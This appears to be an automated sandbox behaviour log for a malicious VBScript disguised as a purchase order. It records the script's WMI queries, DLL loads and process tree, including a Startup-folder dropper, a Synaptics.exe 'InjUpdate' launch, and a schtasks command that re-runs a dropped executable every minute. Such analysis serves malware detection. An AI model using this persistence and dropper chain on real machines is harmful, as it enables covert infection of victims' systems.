                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: Open Purchase Order Summary Details-16-12-2024.vbsVirustotal: Detection: 44%
                            Source: Open Purchase Order Summary Details-16-12-2024.vbsReversingLabs: Detection: 28%
                            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Details-16-12-2024.vbs"
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess created: C:\Users\user\AppData\Local\Temp\._cache_Google.exe "C:\Users\user\AppData\Local\Temp\._cache_Google.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                            Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
                            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 4768
                            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 4836
                            Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 12388
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess created: C:\Users\user\AppData\Local\Temp\._cache_Google.exe "C:\Users\user\AppData\Local\Temp\._cache_Google.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbsJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe"
                            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: wsock32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: netapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: twext.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: twinapi.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: starttiledata.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: acppage.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: sfc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: msi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: aepic.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeSection loaded: pcacli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: wsock32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
